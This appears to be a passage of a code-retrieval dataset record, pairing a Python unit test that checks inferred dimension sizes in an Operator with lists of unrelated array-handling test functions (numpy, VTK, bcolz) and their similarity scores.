array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Test Numeric array handling.\n N = 3\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([3, 0, 1, 2]*3, numpy.int) \n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N)\n\n # Test if a list of Numeric arrays of different cell lengths works.\n l_a = [a[:,:1], a, a[:2,:2]]\n cells = array_handler.array2vtkCellArray(l_a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([1, 0]*3 + [3, 0, 1, 2]*3 + [2, 0,1]*2, numpy.int)\n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N*2 + 2)\n\n # This should not take a long while. This merely tests if a\n # million cells can be created rapidly.\n N = int(1e6)\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n self.assertEqual(cells.GetNumberOfCells(), N)", "def test_deref_array(self):\n sigs = [[['vtkDataArray']],\n [['vtkFloatArray']],\n [['vtkCellArray']],\n [['vtkPoints']],\n [['int', 'vtkIdList']],\n [['int', ('float', 'float'), 'vtkDataArray']],\n [['Prop', 'int', 'vtkDataArray']],\n [['Points', ('float', 'float', 'float')]]\n ]\n args = [[[1,2,3]],\n [[0,0,0]],\n [[[1,2,3],[4,5,6]]],\n [[[0.,0.,0.], [1.,1.,1.]]],\n [1, [1,2,3]],\n [1, (0.0, 0.0), [1.0, 1.0, 1.0]],\n [Prop(), 1, numpy.array([1.0, 1.0, 1.0])],\n [[[1,2,3]], [1,2,3]]\n ]\n r = array_handler.deref_array(args[0], sigs[0])\n self.assertEqual(mysum(array_handler.vtk2array(r[0]) -args[0]), 0)\n r = array_handler.deref_array(args[1], sigs[1])\n self.assertEqual(mysum(array_handler.vtk2array(r[0]) - args[1]), 0)\n\n r = array_handler.deref_array(args[2], sigs[2])\n self.assertEqual(r[0].GetNumberOfCells(), 2)\n \n r = array_handler.deref_array(args[3], sigs[3])\n self.assertEqual(mysum(array_handler.vtk2array(r[0].GetData()) -\n numpy.array(args[3], 'f')), 0)\n \n r = array_handler.deref_array(args[4], sigs[4])\n self.assertEqual(r[0], 1)\n self.assertEqual(r[1].__class__.__name__, 'vtkIdList')\n \n r = array_handler.deref_array(args[5], sigs[5])\n self.assertEqual(r[0], 1)\n self.assertEqual(r[1], (0.0, 0.0))\n self.assertEqual(mysum(array_handler.vtk2array(r[2]) -args[5][2]), 0)\n \n r = array_handler.deref_array(args[6], sigs[6])\n self.assertEqual(r[0].IsA('vtkProperty'), True)\n self.assertEqual(r[1], 1)\n self.assertEqual(mysum(array_handler.vtk2array(r[2]) -args[6][2]), 0)\n\n r = array_handler.deref_array(args[7], sigs[7])", "def test_op_isub_array_int(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1, 4711 * 1024, dtype=int)\n o = a + 1\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_o = stream.bind(o)\n offl_a -= o\n offl_a.update_host()\n r = offl_a.array\n stream.sync()\n\n self.assertTrue((r != old_a).all(),\n \"Array operand must be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n 
y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_check_array_t(self):\n with LogCapture() as log:\n log.setLevel(logging.INFO)\n vb = self.ph5validate.check_array_t()\n\n self.assertEqual(log.records[0].msg, \"Validating Array_t\")\n\n self.assertEqual(\n self.ph5validate.das_time,\n {('12183', 1, 500):\n {'max_pickup_time': [1550850187],\n 'time_windows': [(1550849950, 1550850034, '9001'),\n (1550849950, 1550850034, '9001'),\n (1550849950, 1550850034, '9001'),\n (1550850043, 1550850093, '9002'),\n (1550850125, 1550850187, '9003')],\n 'min_deploy_time':\n [1550849950,\n 'Data exists before deploy time: 7 seconds.']}}\n )\n\n self.assertEqual(vb[0].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9001 Channel 1\\n'\n '2 error, 3 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[0].info, [])\n self.assertEqual(\n vb[0].warning,\n ['No station description found.',\n 'Data exists before deploy time: 7 seconds.',\n 'Station 9001 [1550849950, 1550850034] is repeated 2 time(s)'])\n self.assertEqual(\n vb[0].error,\n ['No Response table found. Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )\n\n self.assertEqual(vb[1].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9002 Channel 1\\n'\n '2 error, 2 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[1].info, [])\n self.assertEqual(\n vb[1].warning,\n ['No station description found.',\n 'Data exists after pickup time: 36 seconds.'])\n self.assertEqual(\n vb[1].error,\n ['No Response table found. Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )\n\n self.assertEqual(vb[2].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9003 Channel 1\\n'\n '2 error, 2 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[2].info, [])\n self.assertEqual(\n vb[2].warning,\n ['No station description found.',\n 'Data exists after pickup time: 2 seconds.'])\n self.assertEqual(\n vb[2].error,\n ['No Response table found. 
Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )", "def test03(self):\n dtype = np.dtype([('f1', [('f1', 'i2'), ('f2', 'i4')])])\n a = np.ones(3000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")", "def test07(self):\n types = [np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64,\n np.float16, np.float32, np.float64,\n np.complex64, np.complex128]\n if hasattr(np, 'float128'):\n types.extend([np.float128, np.complex256])\n shapes = [(10,), (10, 10), (10, 10, 10)]\n for shape in shapes:\n for t in types:\n a = bcolz.zeros(shape, t)\n b = bcolz.carray(a)\n self.assertEqual(a.dtype, b.dtype)\n self.assertEqual(a.shape, b.shape)\n self.assertEqual(a.shape, shape)", "def test_float_array_variable(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"float array C =\\n\\t-0.1, 0.2\")\n assert np.all(bb._var[\"C\"] == np.array([[-0.1, 0.2]]))", "def test_obsm_values_ara_numpy(self):\n\n self.validator.adata.obsm[\"X_tsne\"] = pd.DataFrame(\n self.validator.adata.obsm[\"X_umap\"], index=self.validator.adata.obs_names\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, \"\n \"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ],\n )", "def array(self):", "def check_array(self, array: ArrayData, value: List[int]):\n assert self._call is not None, f\"You must first call a function before checking its return values!\"\n \"\"\" Checks that when this function is called, we have not already assembled and run the test. \"\"\"\n assert not self._has_executed, f\"Test has already been assembled and run!\"\n assert len(value) > 0, \"Array to compare against has to contain at least one element.\"\n assert len(value) <= len(array), \"Array to compare against must contain a smaller or equal amount of elements.\"\n expected = self.array(value).name\n actual = \"la a2, \" + self._lookup_array(array)\n self._compare_int_array(array.name, actual, expected, value, exit_code = 2)", "def test_assign_resources_to_tmc_subarray_in_low():", "def test_nbands_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[0], 2)", "def test04a(self):\n a = np.arange(1e3)\n b = bcolz.carray(a, chunklen=16, rootdir=self.rootdir)\n sl = slice(1, 2)\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")", "def test_renderer_works_correctly_with_numpy_array(self):\n data = numpy.array([1])\n rendered = self.renderer.render(\n data=data, media_type=\"application/json\", renderer_context={}\n )\n reloaded = orjson.loads(rendered)\n\n self.assertEqual(reloaded, data)", "def test_shannon(self):\n c = array([5])\n self.assertFloatEqual(shannon(c), 0)\n c = array([5,5])\n self.assertFloatEqual(shannon(c), 1)\n c = array([1,1,1,1,0])\n self.assertEqual(shannon(c), 2)", "def test_allnegative2(self):\n\n slot = [[-1,-1,0,-9,-2,-2],[-2,-1,-6,-8,-2,-5],[-1,-1,-1,-2,-3,-4],[-1,-9,-2,-4,-4,-5],[-7,-3,-3,-2,-9,-9],[-1,-3,-1,-2,-4,-5]]\n self.assertEqual(array_func(slot),-6)", "def test_call(self):\r\n # A lot of the returned numbers are based on random permutations and\r\n # thus cannot be tested for exact values. We'll test what we can\r\n # exactly, and then test for \"sane\" values for the \"random\" values. 
The\r\n # matplotlib Figure object cannot be easily tested either, so we'll try\r\n # our best to make sure it appears sane.\r\n obs = self.mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [0.5757052546507142, 0.60590471266814283,\r\n 0.63610417068557146, 0.66630362870299997, 0.69650308672042849,\r\n 0.72670254473785723, 0.75690200275528574]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [12, 6, 8, 10, 12, 16, 8]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.73244729118260765, 0.31157641757444593,\r\n 0.17627427296718071, None, None, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [0.57, 0.58, 0.59, 0.6,\r\n 0.61, 0.62, 0.63, 0.64, 0.65])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.1, 0.2, 0.3, 0.4, 0.5,\r\n 0.6, 0.7, 0.8, 0.9])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 7)\r\n self.assertEqual(p_vals[3:], [None, None, None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[1] <= 1.0)\r\n self.assertTrue(0.0 <= p_vals[2] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals,\r\n [p_val * 3 if p_val is not None else None for p_val in p_vals])\r\n\r\n if (p_vals[0] >= 0 and p_vals[0] <= 0.01 and p_vals[1] > 0.01 and\r\n p_vals[1] <= 0.1 and p_vals[2] > 0.1 and p_vals[2] <= 0.5):\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_call_small(self):\r\n # The expected output was verified with vegan's mantel correlogram\r\n # function.\r\n obs = self.small_mc()\r\n\r\n exp_method_name = 'Mantel Correlogram'\r\n self.assertEqual(obs['method_name'], exp_method_name)\r\n\r\n exp_class_index = [3.0, 5.0, 7.0]\r\n assert_almost_equal(obs['class_index'], exp_class_index)\r\n\r\n exp_num_dist = [2, 2, 2]\r\n self.assertEqual(obs['num_dist'], exp_num_dist)\r\n\r\n exp_mantel_r = [0.86602540378443871, None, None]\r\n self.compare_multiple_level_array(obs['mantel_r'], exp_mantel_r)\r\n\r\n # Test matplotlib Figure for a sane state.\r\n obs_fig = obs['correlogram_plot']\r\n obs_ax = 
obs_fig.get_axes()[0]\r\n self.assertEqual(obs_ax.get_title(), \"Mantel Correlogram\")\r\n self.assertEqual(obs_ax.get_xlabel(), \"Distance class index\")\r\n self.assertEqual(obs_ax.get_ylabel(), \"Mantel correlation statistic\")\r\n assert_almost_equal(obs_ax.get_xticks(), [2.85, 2.9, 2.95, 3., 3.05,\r\n 3.1, 3.15, 3.2])\r\n assert_almost_equal(obs_ax.get_yticks(), [0.82, 0.83, 0.84, 0.85,\r\n 0.86, 0.87, 0.88, 0.89, 0.9, 0.91])\r\n\r\n # Test p-values and corrected p-values.\r\n found_match = False\r\n for i in range(self.p_val_tests):\r\n obs = self.small_mc()\r\n p_vals = obs['mantel_p']\r\n corr_p_vals = obs['mantel_p_corr']\r\n self.assertEqual(len(p_vals), 3)\r\n self.assertEqual(p_vals[1:], [None, None])\r\n self.assertTrue(0.0 <= p_vals[0] <= 1.0)\r\n self.compare_multiple_level_array(corr_p_vals, p_vals)\r\n\r\n if p_vals[0] >= 0 and p_vals[0] <= 0.5:\r\n found_match = True\r\n break\r\n self.assertTrue(found_match)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_data_norange(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n lensumrange = random.randint(1, 10)\n\n ex.nreps = nreps\n ex.sumrange = [\"j\", range(lensumrange)]\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"Y\"][\"with\"].add(\"j\")\n ex.vary[\"Y\"][\"along\"] = 0\n ex.vary[\"Z\"][\"with\"].update([\"rep\", \"j\"])\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], cmds)\n idx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", idx * m * n, \"X_%d\" % idx], cmds)\n\n self.assertIn([\n \"dmalloc\", \"Y\", lensumrange * m * m + (lensumrange - 1) * m\n ], cmds)\n idx = random.randint(0, lensumrange - 1)\n self.assertIn([\"doffset\", \"Y\", idx * m, \"Y_%d\" % idx], cmds)\n\n self.assertIn([\"cmalloc\", \"Z\", nreps * lensumrange * n * n], cmds)\n idxrep = random.randint(0, nreps - 1)\n idxrange = random.randint(0, lensumrange - 1)\n self.assertIn([\"coffset\", \"Z\",\n (idxrep * lensumrange + idxrange) * n * n,\n \"Z_%d_%d\" % (idxrep, idxrange)], cmds)", "def test_array_cache(self):\n cache = array_handler.ArrayCache()\n # Test if len works.\n self.assertEqual(len(cache), 0)\n arr = numpy.zeros(100, float)\n varr = vtk.vtkFloatArray()\n # test contains\n self.assertEqual(varr not in cache, True)\n cache.add(varr, arr)\n self.assertEqual(len(cache), 1)\n self.assertEqual(varr in cache, True)\n \n # Test the get method.\n self.assertEqual(cache.get(varr) is arr, True)\n\n # Test if the cache is cleared when the array is deleted.\n del varr\n self.assertEqual(len(cache), 0)" ]
[ "0.6313198", "0.6234536", "0.61531353", "0.60441715", "0.5897211", "0.58689487", "0.5791092", "0.5729955", "0.5682435", "0.5682435", "0.5633471", "0.55964816", "0.55935395", "0.5578403", "0.5577986", "0.5554115", "0.5551436", "0.555043", "0.554579", "0.5534603", "0.55257624", "0.55253726", "0.55050606", "0.55000937", "0.5488189", "0.54770494", "0.54725534", "0.5459195", "0.5446116", "0.54443127", "0.5419334", "0.5417154", "0.54116315", "0.53868574", "0.53700703", "0.5359558", "0.5358397", "0.5354476", "0.5353809", "0.53478897", "0.5347381", "0.5346172", "0.5346172", "0.5344917", "0.53375465", "0.53370756", "0.5328904", "0.53223383", "0.5320577", "0.5316061", "0.5315716", "0.5315716", "0.5311333", "0.5308855", "0.5307276", "0.5305906", "0.53037757", "0.52925736", "0.5292477", "0.52899444", "0.52819824", "0.527819", "0.52780366", "0.5277204", "0.52747935", "0.5269721", "0.5267073", "0.5259632", "0.5254121", "0.525395", "0.52465135", "0.5239102", "0.5216191", "0.5214265", "0.5203219", "0.519933", "0.51976174", "0.5194959", "0.51942396", "0.517296", "0.51726556", "0.5169713", "0.51665485", "0.5165983", "0.51629454", "0.5162594", "0.51617134", "0.5161357", "0.51592565", "0.515786", "0.5155635", "0.51506436", "0.5146733", "0.5142081", "0.5140946", "0.51401377", "0.5138945", "0.513788", "0.51335347", "0.51304436" ]
0.6475489
0
Test that the dimension sizes are being inferred correctly
def test_dimension_size_infer(self, nt=100): i, j, k = dimify('i j k') shape = tuple([d.size for d in [i, j, k]]) a = DenseData(name='a', shape=shape).indexed b = TimeData(name='b', shape=shape, save=True, time_dim=nt).indexed eqn = Eq(b[time, x, y, z], a[x, y, z]) op = Operator(eqn) _, op_dim_sizes = op.arguments() assert(op_dim_sizes[time.name] == nt)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_size_check(self):\n [x1, y1, s1, g1] = self.data.diffusion_data.shape\n [x2, y2, s2, g2] = module_05.run_module(self.data).diffusion_data.shape\n self.assertEqual(x1, x2)\n self.assertEqual(y1, y2)\n self.assertEqual(s1, s2)\n self.assertEqual(g1, g2)", "def dimension_check():\n print(\"### DIMENSION CHECK ###\")\n print(X.shape,\n y.shape,\n X_train.shape,\n y_train.shape,\n X_test.shape,\n y_test.shape,\n weights.shape)\n print(\"### END ###\")", "def test_dimensions(self):\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\t\n\t\t# default\t\n\t\tdetails = self.watcher.describe(layers=[self.first_layer])\n\t\tprint(details)\n\t\tN = details.N.to_numpy()[0]\n\t\tM = details.M.to_numpy()[0]\n\t\trf = details.rf.to_numpy()[0]\n\t\tnum_evals = details.num_evals.to_numpy()[0]\n\t\tprint(N,M,rf,num_evals)\n\t\t\n\t\tself.assertEqual(N,64)\n\t\tself.assertEqual(M,3)\n\t\tself.assertEqual(rf,9)\n\t\tself.assertEqual(num_evals,M*rf)", "def dimensions():", "def _autocheck_dimensions(self):\n # W dimensions check list\n assert len(self.W.shape) == 2, f\"W shape should be (N, N) but is {self.W.shape}.\"\n assert self.W.shape[0] == self.W.shape[1], f\"W shape should be (N, N) but is {self.W.shape}.\"\n\n # Win dimensions check list\n assert len(self.Win.shape) == 2, f\"Win shape should be (N, input) but is {self.Win.shape}.\"\n err = f\"Win shape should be ({self.W.shape[1]}, input) but is {self.Win.shape}.\"\n assert self.Win.shape[0] == self.W.shape[0], err\n\n # Wout dimensions check list\n assert len(self.Wout.shape) == 2, f\"Wout shape should be (output, nb_states) but is {self.Wout.shape}.\"\n nb_states = self.Win.shape[1] + self.W.shape[0] + 1 if self.use_raw_inp else self.W.shape[0] + 1\n err = f\"Wout shape should be (output, {nb_states}) but is {self.Wout.shape}.\"\n assert self.Wout.shape[1] == nb_states, err\n\n # Wfb dimensions check list\n if self.Wfb is not None:\n assert len(self.Wfb.shape) == 2, f\"Wfb shape should be (input, output) but is {self.Wfb.shape}.\"\n err = f\"Wfb shape should be ({self.Win.shape[0]}, {self.Wout.shape[0]}) but is {self.Wfb.shape}.\"\n assert (self.Win.shape[0],self.Wout.shape[0]) == self.Wfb.shape, err", "def test_reduce_dimensionality(base_bertopic, embeddings, shape):\n umap_embeddings = base_bertopic._reduce_dimensionality(embeddings)\n assert umap_embeddings.shape == (shape, 5)", "def test_reduce_dimensionality(embeddings, shape):\n model = BERTopic()\n umap_embeddings = model._reduce_dimensionality(embeddings)\n assert umap_embeddings.shape == (shape, 5)", "def getDimensions():", "def test_batch_size_pack_size():", "def _check_sizes(self, space):\n my_dimension = self.get_total_dimension()\n other_dimension = space.get_total_dimension()\n if my_dimension != other_dimension:\n if isinstance(space, Conv2DSpace):\n if my_dimension * space.shape[0] !=\\\n other_dimension:\n raise ValueError(str(self)+\" with total dimension \" +\n str(my_dimension) +\n \" can't format a batch into \" +\n str(space) + \"because its total dimension\\\n is \" +\n str(other_dimension))", "def dimension(self):", "def _check_dimensions(self, workspace_to_check):\n for i in range(self._raw_ws.getNumDims()):\n if self._raw_ws.getDimension(i).getNBins() != workspace_to_check._raw_ws.getDimension(i).getNBins():\n return False\n return True", "def check_dimensions(d_real, d_fake, d_real_logits, d_fake_logits):\n def _check_pair(a, b):\n if a != b:\n raise ValueError(\"Shape mismatch: %s vs %s.\" % (a, b))\n if len(a) != 2 or len(b) != 
2:\n raise ValueError(\"Rank: expected 2, got %s and %s\" % (len(a), len(b)))\n\n if (d_real is not None) and (d_fake is not None):\n _check_pair(d_real.shape.as_list(), d_fake.shape.as_list())\n if (d_real_logits is not None) and (d_fake_logits is not None):\n _check_pair(d_real_logits.shape.as_list(), d_fake_logits.shape.as_list())\n if (d_real is not None) and (d_real_logits is not None):\n _check_pair(d_real.shape.as_list(), d_real_logits.shape.as_list())", "def test_n_dim(self):\n with Pandas() as pd:\n if pd is None:\n return\n with Numpy() as np: # noqa\n if numpy is None:\n return\n sys.stderr.write(\"\\n\")\n\n df, hist1, hist2, hist3 = get_test_histograms1()\n hist0 = hg.Count()\n\n assert hist0.n_dim == 0\n assert hist1.n_dim == 1\n assert hist2.n_dim == 2\n assert hist3.n_dim == 3", "def valid_ndim_assertion(expected_dimentions, actual_dimention, name):\n\tassert (actual_dimention in expected_dimentions), \"Invalid ndim of {} should be {}\".format(name, str(expected_dimentions))", "def test_point_within_dimensions_invalid_sizes():\n point = np.array([20, 20, 20])\n image_dimensions = np.array([100, 100])\n\n with pytest.raises(AssertionError):\n assert not point_within_dimensions(point, image_dimensions)\n\n point = np.array([20, 20])\n image_dimensions = np.array([100, 100, 100])\n\n with pytest.raises(AssertionError):\n assert not point_within_dimensions(point, image_dimensions)", "def _validate_dimensions(config):\n logging.info(\"Checking provided dimensions are valid\")\n for feature in config.get(\"test-suites\").values():\n for test_name, test in feature.items():\n for dimensions_config in test[\"dimensions\"]:\n _validate_schedulers(config, dimensions_config.get(\"schedulers\", []))\n if [] in dimensions_config.values():\n logging.error(\"Values assigned to dimensions in test %s cannot be empty\", test_name)\n raise AssertionError", "def _automatic_dims(cls, dims, size):\n if dims is None:\n dims = size\n elif np.product(dims) != size:\n raise QiskitError(\"dimensions do not match size.\")\n if isinstance(dims, (int, np.integer)):\n num_qubits = int(np.log2(dims))\n if 2 ** num_qubits == size:\n return num_qubits * (2,)\n return (dims,)\n return tuple(dims)", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_vector_dimensions(self):\r\n # crear una lista 1-D (Horizontal, Entradas). 
\r\n Z = [1, 2, 3, 4, 5]\r\n # crear una lista 1-D (Vertical, Pesos de la red).\r\n W = [10, 20, 30]\r\n # Notemos que las dimensiones de Z y W son diferentes.\r\n try:\r\n neuron = rhonn(W, Z)\r\n except ValueError as e:\r\n # Comprobamos que efectivamente hay un error en las dimensiones.\r\n self.assertEqual(type(e), ValueError)\r\n else:\r\n self.fail('El error no fue lanzado.')", "def test_ncols_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[2], 235)", "def _test_obssize(t):\n return t.shape[0] != len(t.ids(axis='observation'))", "def _assert_same_size(outputs: TensorStruct, output_size: OutputSize):\n flat_output_size = nest.flatten(output_size)\n flat_output = nest.flatten(outputs)\n for output, size in zip(flat_output, flat_output_size):\n if isinstance(size, torch.Size):\n if output[0].size() != size:\n raise ValueError('The output size does not matchthe required output_size')\n elif output[0].size()[-1] != size:\n raise ValueError('The output size does not match the required output_size')", "def test_ban_size_kwarg(self):\n with pytest.raises(ValueError):\n Dimension(\"yolo\", \"norm\", 0.9, size=(3, 2))", "def testQuestionThree(self):\n self.assertEqual(AnswerQuestionThree().shape, (10,), \"Question three's output is not one dimension.\") \n self.assertEqual(AnswerQuestionThree().size, 10, \"Question three's output is not 10 long.\")", "def test_get_dim(self):\n self.assertEqual(self.game.get_dim(), self.game._dim)", "def check_qim_dim_match(cls, qim, dim):\n return len(qim) == len(dim)", "def _check_dimensions(self) -> None:\n dims = (self.y_dim, self.x_dim)\n da = self._obj[self.vars[0]] if isinstance(self._obj, xr.Dataset) else self._obj\n extra_dims = [dim for dim in da.dims if dim not in dims]\n if len(extra_dims) == 1:\n dims = tuple(extra_dims) + dims\n self.set_attrs(dim0=extra_dims[0])\n elif len(extra_dims) == 0:\n self._obj.coords[GEO_MAP_COORD].attrs.pop(\"dim0\", None)\n elif len(extra_dims) > 1:\n raise ValueError(\"Only 2D and 3D data arrays supported.\")\n if isinstance(self._obj, xr.Dataset):\n check = np.all([self._obj[name].dims == dims for name in self.vars])\n else:\n check = self._obj.dims == dims\n if check == False:\n raise ValueError(\n f\"Invalid dimension order ({da.dims}). 
\"\n f\"You can use `obj.transpose({dims}) to reorder your dimensions.\"\n )", "def _assert_same_size(outputs, output_size):\n nest.assert_same_structure(outputs, output_size)\n flat_output_size = nest.flatten(output_size)\n flat_output = nest.flatten(outputs)\n\n for (output, size) in zip(flat_output, flat_output_size):\n if isinstance(size, tf.TensorShape):\n if output.shape == size:\n pass\n elif output[0].shape != tf.TensorShape(size):\n raise ValueError(\n \"The output size does not match the the required output_size\")", "def test_get_dimension(self):\n\n v = Vector({ 'x': 1 })\n self.assertEqual(1, v.dimensions['x'])", "def test_dim_empty_list(a, b, metrics):\n if metrics in correlation_metrics:\n metric, _metric = metrics\n with pytest.raises(ValueError) as excinfo:\n metric(a, b, dim=[])\n assert \"requires `dim` not being empty, found dim\" in str(excinfo.value)\n elif metrics in distance_metrics:\n metric, _metric = metrics\n res = metric(a, b, dim=[])\n assert len(res.dims) == len(a.dims), print(res.dims)", "def test_dimensions_vector_space(self):\n\n v = Vector()\n self.assertEqual(VectorSpace, type(v.dimensions))", "def test_load_return_shape(size):\n X_train, X_test, y_train, y_test = src.load(train_size=size)\n num_samples = 1797\n assert X_train.shape == (int(num_samples * size), 64)\n assert X_test.shape == (int(num_samples * (1 - size)) + 1, 64)", "def test_dimension_size_override(self, nt=100):\n i, j, k = dimify('i j k')\n a = TimeData(name='a', dimensions=(i, j, k))\n one = symbol(name='one', dimensions=(i, j, k), value=1.)\n op = Operator(Eq(a.forward, a + one))\n\n # Test dimension override via the buffered dimenions\n a.data[0] = 0.\n op(a=a, t=6)\n assert(np.allclose(a.data[1], 5.))\n\n # Test dimension override via the parent dimenions\n a.data[0] = 0.\n op(a=a, time=5)\n assert(np.allclose(a.data[0], 4.))", "def check_resize_size(size):\n if isinstance(size, int):\n check_value(size, (1, FLOAT_MAX_INTEGER))\n elif isinstance(size, (tuple, list)) and len(size) == 2:\n for i, value in enumerate(size):\n check_value(value, (1, INT32_MAX), \"size at dim {0}\".format(i))\n else:\n raise TypeError(\"Size should be a single integer or a list/tuple (h, w) of length 2.\")", "def test_embedder_dimensions(self, setup_bert_embedder):\n bert_embedder, lines = setup_bert_embedder\n encoding = bert_embedder(lines)\n lens = [len(line.tokens[\"tokens\"]) for line in lines]\n max_word_len = max(lens)\n assert encoding.size(0) == 2\n assert encoding.size(2) == bert_embedder.get_embedding_dimension()\n assert encoding.size(1) == max_word_len", "def testQuestionTwo(self):\n self.assertEqual(AnswerQuestionTwo().shape, (5,5), \"Question two's output is not one dimension.\")", "def test_valid_sizes(self):\n for size in settings.MISAGO_AVATARS_SIZES:\n self.assertEqual(clean_size(size), size)", "def test_ncols_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[2], 235)", "def testscftargetdim(self):\r\n dim_scftargets = self.data.scftargets.shape\r\n dim_scfvalues = (len(self.data.scfvalues),len(self.data.scfvalues[0][0]))\r\n assert dim_scftargets == dim_scfvalues", "def dim(self) -> int:", "def count_dims(da):\n return len(da.dims)", "def check_dimensions(X, x_lat_dim, x_lon_dim, x_sample_dim, x_feature_dim):\n\tassert 4 <= len(X.dims) <= 5, 'XCast requires a dataset to be 4-Dimensional'\n\tassert x_lat_dim in X.dims, 'XCast requires a dataset_lat_dim to be a dimension on X'\n\tassert x_lon_dim in X.dims, 'XCast requires a dataset_lon_dim to be a dimension on 
